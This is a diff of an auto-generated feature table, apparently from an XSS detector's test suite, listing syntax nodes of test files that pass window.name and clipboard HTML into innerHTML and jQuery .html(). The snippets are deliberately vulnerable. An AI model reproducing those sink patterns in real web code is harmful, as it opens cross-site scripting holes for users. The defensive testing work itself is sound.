innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | @@ -12346,18 +92827,48 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:79 | documen ... ` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:79 | documen ... ` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:17:5:17:79 | documen ... ` | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:17:14:17:17 | body | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:14:17:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:14:17:17 | body | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:14:17:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:14:17:17 | body | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:17:19:17:27 | innerHTML | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:19:17:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:19:17:27 | innerHTML | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:19:17:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:19:17:27 | innerHTML | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:17:32:17:79 | `` | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:32:17:79 | `` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:32:17:79 | `` | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:32:17:79 | `` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:32:17:79 | `` | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:33:17:45 | Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:17:33:17:45 | Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:51 | clsx | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:51 | clsx | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:51 | clsx | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:51 | clsx | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:51 | clsx | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | clsx(window.name) | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | clsx(window.name) | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | clsx(window.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | clsx(window.name) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | clsx(window.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | clsx(window.name) | stringConcatenatedWith | document.body.innerHTML + 'Hello' | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | exceptional return of clsx(window.name) | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | exceptional return of clsx(window.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | exceptional return of clsx(window.name) | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | exceptional return of clsx(window.name) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:48:17:64 | exceptional return of clsx(window.name) | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:58 | window | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:58 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:58 | window | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:58 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:58 | window | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:63 | window.name | CalleeFlexibleAccessPath | clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:63 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:63 | window.name | calleeImports | clsx | @@ -12366,17 +92877,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:63 | window.name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:63 | window.name | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:17:53:17:63 | window.name | fileImports | classnames classnames/bind classnames/dedupe clsx | +| autogenerated/Xss/DomBasedXss/classnames.js:17:60:17:63 | name | contextFunctionInterfaces | main() | +| autogenerated/Xss/DomBasedXss/classnames.js:17:60:17:63 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/classnames.js:17:60:17:63 | name | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | +| autogenerated/Xss/DomBasedXss/classnames.js:17:60:17:63 | name | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/classnames.js:17:60:17:63 | name | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:66:17:78 | ">Hello | contextFunctionInterfaces | main() | | autogenerated/Xss/DomBasedXss/classnames.js:17:66:17:78 | ">Hello | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/classnames.js:17:66:17:78 | ">Hello | enclosingFunctionBody | document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello unsafeStyle classNames bind foo window name document body innerHTML Hello safeStyle classNames bind document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello document body innerHTML Hello | | autogenerated/Xss/DomBasedXss/classnames.js:17:66:17:78 | ">Hello | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/classnames.js:17:66:17:78 | ">Hello | fileImports | classnames classnames/bind classnames/dedupe clsx | | autogenerated/Xss/DomBasedXss/classnames.js:17:66:17:78 | ">Hello | stringConcatenatedWith | document.body.innerHTML + ' ... \\n } | CalleeFlexibleAccessPath | el.addEventListener | | autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | (e) => ... \\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | (e) => ... \\n } | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12445,6 +93436,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | (e) => ... \\n } | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | (e) => ... \\n } | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | (e) => ... \\n } | receiverName | el | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | exceptional return of anonymous function | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | exceptional return of anonymous function | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | return of anonymous function | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | return of anonymous function | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:34:25:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:23:35:23:35 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:9 | $ | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:9 | $ | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:9 | $ | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:9 | $ | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:9 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | $("#id") | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | $("#id") | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | $("#id") | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | exceptional return of $("#id") | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | exceptional return of $("#id") | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | exceptional return of $("#id") | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:16 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:21 | $("#id").html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:21 | $("#id").html | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:21 | $("#id").html | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:21 | $("#id").html | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:21 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | $("#id" ... html')) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | $("#id" ... html')) | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | $("#id" ... html')) | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | $("#id" ... html')) | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | $("#id" ... html')) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | exceptional return of $("#id" ... html')) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | exceptional return of $("#id" ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | exceptional return of $("#id" ... html')) | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | exceptional return of $("#id" ... html')) | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:9:24:59 | exceptional return of $("#id" ... html')) | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:11:24:15 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:11:24:15 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:11:24:15 | "#id" | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12452,6 +93493,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:24:11:24:15 | "#id" | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:11:24:15 | "#id" | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:11:24:15 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:18:24:21 | html | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:18:24:21 | html | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:18:24:21 | html | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:18:24:21 | html | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:18:24:21 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:23 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:23 | e | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:23 | e | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:23 | e | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:23 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:37 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:37 | e.clipboardData | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:37 | e.clipboardData | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:37 | e.clipboardData | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:37 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:45 | e.clipb ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:45 | e.clipb ... getData | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:45 | e.clipb ... getData | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:45 | e.clipb ... getData | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:45 | e.clipb ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | e.clipb ... /html') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | e.clipb ... /html') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12459,6 +93520,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | e.clipb ... /html') | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | e.clipb ... /html') | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | exceptional return of e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | exceptional return of e.clipb ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | exceptional return of e.clipb ... /html') | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | exceptional return of e.clipb ... /html') | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:23:24:58 | exceptional return of e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:25:24:37 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:25:24:37 | clipboardData | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:25:24:37 | clipboardData | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:25:24:37 | clipboardData | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:25:24:37 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:39:24:45 | getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:39:24:45 | getData | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:39:24:45 | getData | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:39:24:45 | getData | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/clipboard.ts:24:39:24:45 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:47:24:57 | 'text/html' | CalleeFlexibleAccessPath | e.clipboardData.getData | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:47:24:57 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:47:24:57 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12466,18 +93542,88 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:24:47:24:57 | 'text/html' | enclosingFunctionBody | el HTMLElement el addEventListener paste e $ #id html e clipboardData getData text/html | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:47:24:57 | 'text/html' | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/clipboard.ts:24:47:24:57 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:28:8 | document | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:28:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:28:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:28:25 | documen ... istener | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:28:25 | documen ... istener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:28:25 | documen ... istener | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:30:2 | documen ... T OK\\n}) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:30:2 | documen ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:30:2 | documen ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:30:2 | exceptional return of documen ... T OK\\n}) | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:30:2 | exceptional return of documen ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:1:30:2 | exceptional return of documen ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:10:28:25 | addEventListener | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:10:28:25 | addEventListener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:10:28:25 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:27:28:33 | 'paste' | CalleeFlexibleAccessPath | document.addEventListener | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:27:28:33 | 'paste' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:27:28:33 | 'paste' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:27:28:33 | 'paste' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:27:28:33 | 'paste' | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:27:28:33 | 'paste' | receiverName | document | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | 'arguments' object of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | (e) => ... OT OK\\n} | CalleeFlexibleAccessPath | document.addEventListener | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | (e) => ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | (e) => ... OT OK\\n} | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | (e) => ... OT OK\\n} | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | (e) => ... OT OK\\n} | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | (e) => ... OT OK\\n} | receiverName | document | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | exceptional return of anonymous function | enclosingFunctionBody | e $ #id html e clipboardData getData text/html | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | exceptional return of anonymous function | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | return of anonymous function | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:28:36:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| 